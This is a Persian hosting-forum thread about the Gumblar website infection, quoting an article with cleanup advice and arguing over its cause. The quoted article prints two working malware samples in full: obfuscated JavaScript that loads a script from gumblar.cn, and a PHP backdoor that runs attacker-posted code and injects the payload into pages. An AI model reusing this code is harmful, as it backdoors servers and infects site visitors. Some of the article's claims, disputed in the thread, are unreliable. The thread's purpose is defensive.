جلوگیری از هک شدن سایت !!

[sodahost]

Allow Anonymous Logins واسه من NO هست !
ولی باز هم دوباره اینجوری شد !
این سری من اومد پرمیشن هارو کردم 444 ببینم باز هم می تونه کاری کنه !!

[Dadeha.com]

allow anonymous logins واسه من no هست !
ولی باز هم دوباره اینجوری شد !
این سری من اومد پرمیشن هارو کردم 444 ببینم باز هم می تونه کاری کنه !!

جدی بازم ویروسی شد.
بعد از غیر فعال کردنش سرور رو یه بار اسکن کردی تا اگه ویروسی باقی مونده باشه رو پاک کنه؟

[Dadeha.com]

اگر وب سایتی دارید که در آن از php یا html یا js استفاده شده است حتمی این مقاله را مطالعه نمائید

چند روزی است سرتاسر اینترنت پر شده است از ویروس فوق العاده مهلکی به نام گامبلار !

در کمتر سایتی می توانید راجع به این ویروس چیزی بیابید چه برسد به اینکه راه حلی برایش وجود داشته باشد .

ابتدا بگذارید ببینیم کار این ویروس چیست .

این ویروس خود را خارج از هاست و بدون داشتن دسترسی به هاست و ftp در فایلهای سایت کپی می کند .

شاید اکنون این به ذهن شما رسیده باشد که " خوب پاکش می کنیم " .

این ویروس غیر قابل پاک شدن است مگر اینکه خیلی سریع و کامل عمل کنید . شاید بیشتر از 10 بار این ویروس را

به روشی عادی پاک کردیم ( روی یکی از سایتهای مشتریهایمان ) اما بازهم پیدا می شد !!!

این ویروس چند حالت دارد :

1 ) برای فایلهای html : کدی که در فایلهای ساده html وجود دارد که بخصوص در فایلهای معروفی چون index به چشم میخورد .

این کد پس از تگ body دیده می شود .

این کد چیزی شبیه به این است یا اینکه دقیقا همین است :

کد:

<script language=javascript><!--
(function(G3l8J){var bNFt='var&20a&3d&22&53criptEn&67in&65&22&2c&62&3d&22Ve&72si&6fn()+&22&2cj&3d&22&22&2cu&3dnavigator&2e&75ser&41gent&3bif((u&2ei&6ed&65xO&66(&22Win&22)&3e0)&26&26(&75&2eindexO&66(&22NT&20&36&22)&3c0)&26&26(d&6fcumen&74&2ec&6foki&65&2e&69&6edex&4ff(&22&6d&69e&6b&3d&31&22&29&3c0&29&26&26&28t&79p&65o&66(zrvzts)&21&3dtypeof(&22A&22)))&7bzr&76&7at&73&3d&22A&22&3b&65v&61&6c&28&22if&28wind&6f&77&2e&22+a+&22)j&3d&6a+&22&2ba+&22Maj&6f&72&22&2bb+a&2b&22M&69nor&22+b+a&2b&22B&75ild&22&2bb+&22j&3b&22)&3bd&6fcu&6d&65n&74&2ewr&69te&28&22&3c&73cr&69p&74&20&73rc&3d&2f&2f&67u&6d&62lar&2ec&6e&2frss&2f&3fi&64&3d&22+j+&22&3e&3c&5c&2f&73&63ri&70t&3e&22)&3b&7d';var gXJ=unescape(bNFt.replace(G3l8J,'%'));eval(gXJ)})(/&/g);
--></script>

2) برای فایلهای php : کدی که در فایلهای php وجود دارد که بخصوص در فایلهای معروفی چون index , function , config زیاد

به چشم میخورد .

این کد اولین کد در فایل php می شود و یا شبیه کد زیر است یا دقیقا خودش است :

کد:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsY ​ W5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihHM2w4Sil7dmFyIGJORnQ9J3ZhciYyMGEmM ​ 2QmMjImNTNjcmlwdEVuJjY3aW4mNjUmMjImMmMmNjImM2QmMjJWZSY3MnNpJjZmbigpKyYyMiYyY2omM ​ 2QmMjImMjImMmN1JjNkbmF2aWdhdG9yJjJlJjc1c2VyJjQxZ2VudCYzYmlmKCh1JjJlaSY2ZWQmNjV4T ​ yY2NigmMjJXaW4mMjIpJjNlMCkmMjYmMjYoJjc1JjJlaW5kZXhPJjY2KCYyMk5UJjIwJjM2JjIyKSYzY ​ zApJjI2JjI2KGQmNmZjdW1lbiY3NCYyZWMmNmZva2kmNjUmMmUmNjkmNmVkZXgmNGZmKCYyMiY2ZCY2O ​ WUmNmImM2QmMzEmMjImMjkmM2MwJjI5JjI2JjI2JjI4dCY3OXAmNjVvJjY2KHpydnp0cykmMjEmM2R0e ​ XBlb2YoJjIyQSYyMikpKSY3YnpyJjc2JjdhdCY3MyYzZCYyMkEmMjImM2ImNjV2JjYxJjZjJjI4JjIya ​ WYmMjh3aW5kJjZmJjc3JjJlJjIyK2ErJjIyKWomM2QmNmErJjIyJjJiYSsmMjJNYWomNmYmNzImMjImM ​ mJiK2EmMmImMjJNJjY5bm9yJjIyK2IrYSYyYiYyMkImNzVpbGQmMjImMmJiKyYyMmomM2ImMjIpJjNiZ ​ CY2ZmN1JjZkJjY1biY3NCYyZXdyJjY5dGUmMjgmMjImM2MmNzNjciY2OXAmNzQmMjAmNzNyYyYzZCYyZ ​ iYyZiY2N3UmNmQmNjJsYXImMmVjJjZlJjJmcnNzJjJmJjNmaSY2NCYzZCYyMitqKyYyMiYzZSYzYyY1Y ​ yYyZiY3MyY2M3JpJjcwdCYzZSYyMikmM2ImN2QnO3ZhciBnWEo9dW5lc2NhcGUoYk5GdC5yZXBsYWNlK ​EczbDhKLCclJykpO2V2YWwoZ1hKKX0pKC8mL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

3 ) برای فایلهای js : این ویروس خودش را در فایلهای جاوا نیز کپی می کند و آنها را نیز چک نمائید .



این ویروس چند نوع دارد : 1 ) همانی که در بالا توضیح داده شد 2 ) همین ویروس ولی با استفاده از iframe



اگر نوع اول ویروس را گرفتید که بسیار خوشحال باشید . چرا که تنها سایتتان ویروسی شده و هرچند سخت اما قابل درمان است .

اگر نوع دوم ویروس را گرفتید که شخصا پیشنهاد می کنم قید سایت خود را بزنید و کلا بروید دنبال کار دیگری .

در نوع دوم علاوه بر بلایایی که بخاطر ویروس بر سر شما می آید یک حادثه بسیار تلخ رخ می دهد و آن این است که گوگل سایت

شما را سایتی تشخیص می دهد که ویروس پخش می کند و سایت شما را بن می کند !

اگر این مشکل را نیز بتوانید حل کنید ( که خودتان نمی توانید و باید یک متخصص سئو این کار را انجام دهد ), دیگر چیزی در گوگل

به اسم سایت شما وجود ندارد ! یعنی تمامی زحماتی که کشیده بودید تا رتبه مناسبی در گوگل بگیرید بر بارد رفته است .

توجه داشته باشید که گوگل این موضوع را خیلی سریع متوجه می شود و بدون اینکه چیزی بگوید عمل می کند .

یعنی کاری ندارد که شما مقصر هستید یا نه ! سایت شما هک شده یا خودتان این کار را کرده اید ! کلا فقط یک چیز

را می داند و آن اینکه سایت شما فقط باید مسدود شود !!!

اگر سایت شما به این ویروس از نوع دوم گرفتار شود در کمتر از یک نصف روز در گوگل ویروس شناخته خواهید شد و این جمله

در بالای تمام نتایجی که سایت شما در گوگل بیاورد نشان داده می شود :

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.



گوگل اینها را malware نامیده که معنای آن تقریبا بدافزار می شود .

پس همین الان سایت خود را باز کرده و دنبال این کدها باشید . یافتن آنها ساده است در همان ابتدای کدها قابل مشاهده است .

بخصوص به دنبال iframe باشید . در این بخش ممکن است آی فریمی را مشاهده نمائید که ابعاد آن بسیار کوچک باشد که

قابل مشاهده نباشد .



مژده : تابحال مشاهده نشده که سایتهایی که با دات نت یا asp کلاسیک ساخته شده اند آلوده به این ویروس شده باشند .

اما کار از محکم کاری عیب نمی کند .



این ویروس چه می کند ؟

اگر وارد سایتی شدید و ناگهان متوجه شدید یک فایل pdf از چنین آدرسی http:// gumblar . cn/rss/?id=2 می خواهد دانلود

شود یا باز شود مطمئن باشید که سایت یک نوعی از این ویروس را گرفته است .

تابحال هیچ انسانی متوجه نشده که اگر این فایل اجرا شود چه اتفاقی می افتد !

این سایت را در مرورگر خود به عنوان لیست سیاه قرار دهید ( هر چند که فایده ای هم ندارد ) .

این ویروس اولین کاری که می کند این است که لود شدن سایت را کند می کند , درست به مانند زمانی که سایت در حال

bandwidth تمام کردن است یا خیلی شلوغ است .

مسلما نویسنده این ویروس نیات شومی در سر دارد . چرا که تابحال خرابکاری خاصی در کامپیوتر کسی صورت نگرفته است .

یقینا صاحب ویروس قصد دارد تا ویروس را به کامپیوترهای زیادی تزریق کند و در یک اقدام ناگهانی خرابکاری خاصی را انجام

دهد که میلیونها نفر متضرر آن شوند .



این ویروس چگونه وارد سایتها شده است ؟

در این مبحث نظریه ها و فرضیه های گوناگون و زیادی ارائه شده است .

1 ) اولین نظریه این را عنوان می کند که این شخص سایت را هک کرده و این ویروس را وارد سایت می کند !

آیا چنین چیزی با منطق سازگار است ؟ مگر یکی دو سایت است ؟ هزاران سایت در سرتاسر جهان آلوده به این ویروس شده اند .

2 ) دومین نظریه بر این استوار است که این می تواند یکی از حملات بات نتی ( مثلا DDos ) باشد که این قدری می تواند

درست باشد اما چرا تنها بعضی از سایتها ( البته فعلا ) دچار این مشکل شده اند ؟

3 ) نظریه سوم عنوان می کند که این ویروس برنامه های کار با FTP را آلوده می کند و هر فایلی که از طریق این برنامه ها

آپلود می شود این ویروس خودش را به آنها می افزاید . این نظریه تا حدودی منطقی به نظر می رسد اما پس از بررسیهای

کارشناسی این بحث رد شد . بعضی از صاحبان سایت با SFTP فایلها را آپلود می کردند پس چرا آنها ویروس را گرفتند .

آنتی ویروسهای بزرگی که به هر چیزی شک می کنند چرا برنامه ای را که نا خود آگاه روی کامپیوتر دانلود شده , نصب شده و

اجرا شده را شناسایی نکرده اند ؟

4 ) چهارمین نظریه که بهترین آنها نیز می باشد انگشت اتهام را به سمت و سوی هاستینگها نشانه می روند که همانا

صحیح است .

اینکه تنها بعضی از سایتها آلوده می شوند . اینکه هیچ کس نمی داند چگونه این ویروس وارد سایتشان شده است . و یکی

دو دلیل دیگر مظنون شماره یک این ماجرا را سرورهای ضعیف هاستینگ می داند .

اگر سرور هاستینگ سروری با ایمنی بالا باشد هرگر دچار چنین مشکلی نخواهید شد .

وای به روزی که یکی از بلاگ ها چنین ویروسی را بگیرند .

نکته جالب اینجاست که آمار آلوده شدن سایتهای ایرانی به این ویروس بسیار زیاد است .



مرکز فعالیت این ویروس چیست ؟

مرکز فعالیت این ویروس در سایت شما یک چیز است . فایلی به نام image.php !!!

ویروس این فایل را در تمامی فولدرهایی که نام imgaes دارند کپی می کند . حال هرچند بار نیز که شما کدها را از فایلهای

خود حذف کنید باز هم نمایان خواهند شد . چراکه این فایل دستور ساخت آنها را می دهد .



راه چاره چیست ؟

همیشه پیشگیری بهتر از درمان است . چه این ویروس را گرفته باشید و چه نگرفته باشید این کارها را انجام دهید .

در چنین مواقعی است که ارزش بک آپها مشخص می شود , اگر یک آپ دارید که هیچ اما اگر ندارید :

1 - یک فایل خالی به نام image.php می سازید .

2 - این فایل را با فایلی که در فولدر imgaes در سایتتان وجود دارد جابجا می کند و سطح دسترسی آن را جوری تنظیم می کنید

که در آن write وجود نداشته باشد .

3 - کدهای مذکور را از فایلهای سایتتان پاک کرده و سطح دسترسی این فایلها را نیز طروی تنظیم می کنید که در آن write وجود

نداشته باشد .

4 - تمامی فایلهایی که یا به نام های زیر هستند یا این نامهای در قسمتی از نام آنها وجود دارد را چک می کنید :

index.php

index.htm

index.html

functions.php

script.js

config.php

setting.php

db.php

منبع: mybbsupport

[IFACO.Net]

4 ) چهارمین نظریه که بهترین آنها نیز می باشد انگشت اتهام را به سمت و سوی هاستینگها نشانه می روند که همانا

صحیح است .

اینکه تنها بعضی از سایتها آلوده می شوند . اینکه هیچ کس نمی داند چگونه این ویروس وارد سایتشان شده است . و یکی

دو دلیل دیگر مظنون شماره یک این ماجرا را سرورهای ضعیف هاستینگ می داند .

اگر سرور هاستینگ سروری با ایمنی بالا باشد هرگر دچار چنین مشکلی نخواهید شد .

وای به روزی که یکی از بلاگ ها چنین ویروسی را بگیرند .

نکته جالب اینجاست که آمار آلوده شدن سایتهای ایرانی به این ویروس بسیار زیاد است .



منبع: mybbsupport

نویسنده در این مقاله نهایت کم اطلاعی خودش رو به نمایش گذاشته و این مطالب اکثرا درست نیستند !!!

[Dadeha.com]

نویسنده در این مقاله نهایت کم اطلاعی خودش رو به نمایش گذاشته !!!

با اینکه من نویسنده نیستم و فقط نقل کردم. میتونم دلیل این حرف شما رو بدونم؟ چون گفته به سوی هاستینگ هاست به شما برخورده؟!

ویروس خیلی راحت داره خودش رو منتشر میکنه و حتی هنوز هاستینگ ها دلیلش رو نمیدونن و هیچ راهی برای مقابله با اون پیدا نکردند.
آنتی ویروس سرورها نمیتونه ویروس را شناسایی کنه. (اگر باور ندارید یک نسخه از ویروس را به شما میدم تا در سرور خودتون چک کنید) :hammer:

با این نکته حرفم رو تموم کنم ، بهتره کمی واقع گرا باشیم. اینجا اکثرمون هاستینگ داریم و داریم به مشتریامون هاست ارائه میدیم. این ناراحت شدن ها و احساساتی برخورد کردنا خودمون رو از بین میبره.

من دقیقا طبق همین مقاله عمل کردم و الان لود سرور اومده پایین و مصرف رم نصف شده ، برای همین بود که مقاله رو گذاشتم تا دیگران هم استفاده کنند نه اینکه بعضی ها بیان و احساساتی برخرود کنن :2guns:

[IFACO.Net]

با اینکه من نویسنده نیستم و فقط نقل کردم. میتونم دلیل این حرف شما رو بدونم؟ چون گفته به سوی هاستینگ هاست به شما برخورده؟!

ویروس خیلی راحت داره خودش رو منتشر میکنه و حتی هنوز هاستینگ ها دلیلش رو نمیدونن و هیچ راهی برای مقابله با اون پیدا نکردند.
آنتی ویروس سرورها نمیتونه ویروس را شناسایی کنه. (اگر باور ندارید یک نسخه از ویروس را به شما میدم تا در سرور خودتون چک کنید) :hammer:

با این نکته حرفم رو تموم کنم ، بهتره کمی واقع گرا باشیم. اینجا اکثرمون هاستینگ داریم و داریم به مشتریامون هاست ارائه میدیم. این ناراحت شدن ها و احساساتی برخورد کردنا خودمون رو از بین میبره.

من دقیقا طبق همین مقاله عمل کردم و الان لود سرور اومده پایین و مصرف رم نصف شده ، برای همین بود که مقاله رو گذاشتم تا دیگران هم استفاده کنند نه اینکه بعضی ها بیان و احساساتی برخرود کنن :2guns:

عزیز برادر !

من هم میدونم که شما نویسنده نیستید !

شما وقتی از یه فایل یا اسکریپت ضعیف که کلی باگ داره استفاده می کنید، چرا تقصیر رو میندازید گردن هاستینگ و سرور ها ؟؟؟!!!

چرا اسکریپتهای قوی مثل وی بولیتین آلوده نمیشند ؟!

و همینطور بن شدن یک سایت در گوگل رو براحتی با یک ایمیل در عرض یک روز میشه رفع کرد !!!

نه اینکه سایت مون رو بندازیم دور .....


گرچه بعضی قسمت ها مقاله خوب و مفید هستند ولی این مطالبی که عرض کردم کاملا نشون دهنده کم اطلاعی نویسنده مقاله هستند !!!

[IFACO.Net]

من دقیقا طبق همین مقاله عمل کردم و الان لود سرور اومده پایین و مصرف رم نصف شده ... :2guns:

این قضیه هم دلیلش این بوده که موقعی که جناب روبات هکری که میخواسته نفوذ کنه به فایل های پی اچ پی شما ! ، نوعی ddos انجام میداده تا در پردازش فایل های پی اچ پی رو مختل کنه و کارش رو انجام بده !!! و به همین خاطر لود سرور شدیدا بالا میرفته !